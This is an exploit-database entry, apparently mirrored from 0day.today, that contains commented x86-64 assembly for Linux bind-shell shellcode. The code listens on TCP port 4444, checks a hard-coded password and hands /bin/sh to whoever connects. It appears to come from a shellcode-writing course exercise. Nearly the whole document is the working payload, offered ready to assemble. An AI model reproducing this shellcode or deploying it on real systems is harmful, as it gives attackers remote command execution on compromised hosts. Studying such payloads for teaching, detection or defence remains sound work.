Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Password) Shellcode (173 bytes)

🗓️ 15 Jan 2018 00:00:00Reported by Christophe GType

zdt🔗 0day.today👁 19 Views

Linux/x86-64 Bind TCP Shellcode with Password promp

;Bind_TCP 4444  with password                        ;
;Default password = Password                         ;
;If connected the shellcode no prompt for password   ;
;Enter password directly and you get the bin/sh shell;
;if password is wrong the shellcode exit:            ;
;Christophe G SLAE64 - 1337 size 173 bytes           ;
 
 
 
global _start
 
 
 
_start:
       
 
; sock = socket(AF_INET, SOCK_STREAM, 0)
; AF_INET = 2
; SOCK_STREAM = 1
; syscall number 41 
 
push 0x29
pop rax
push 0x2
pop rdi
push 0x1
pop rsi
xchg rbx , rdx
syscall
 
; copy socket descriptor to rdi for future use 
xchg rax , rdi
 
 
; server.sin_family = AF_INET 
; server.sin_port = htons(PORT)
; server.sin_addr.s_addr = INADDR_ANY
; bzero(&server.sin_zero, 8)
 
xor rax, rax 
 
mov dword [rsp - 4] , eax
mov word [rsp - 6] ,0x5c11
mov byte [rsp - 8] , 0x2
sub rsp , 8
 
 
; bind(sock, (struct sockaddr *)&server, sockaddr_len)
; syscall number 49
push 0x31
pop rax
mov rsi, rsp
push 0x10
pop rdx
syscall
 
 
; listen(sock, MAX_CLIENTS)
; syscall number 50
 
push 0x32
pop rax
push 0x2
pop rsi 
syscall
 
 
; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)
; syscall number 43
 
 
push 0x2b
pop rax
sub rsp, 0x10
mov rsi, rsp
push 0x10
mov rdx, rsp
 
syscall
 
; store the client socket description 
mov r9, rax 
 
; close parent
push 0x3
pop rax
syscall
 
 
 
 
 
xchg rdi , r9
xor rsi , rsi
 
dup2:
    push 0x21
    pop rax
    syscall
    inc rsi
    cmp rsi , 0x2
    loopne dup2
 
CheckPass:
    xor rax , rax
    push 0x10
    pop rdx
    sub rsp , 16                 ; 16 bytes to receive user input 
    mov rsi , rsp
    xor edi , edi
    syscall                      ; system read function call
    mov rax , 0x64726f7773736150 ; "Password"
    lea rdi , [rel rsi]
    scasq
    jz Execve
    push 0x3c
    pop rax
    syscall
 
 
 
 
 
Execve:
    xor rax , rax
    mov rdx , rax 
    push rax
 
    mov rbx, 0x68732f2f6e69622f
    push rbx
 
    ; store /bin//sh address in RDI
    mov rdi, rsp
 
    ; Second NULL push
    push rax
                 
 
    ; Push address of /bin//sh
    push rdi
 
    ; set RSI
    mov rsi, rsp
 
    ; Call the Execve syscall
    push 0x3b
    pop rax
    syscall

15 Jan 2018 00:00Current

7.1High risk

Vulners AI Score7.1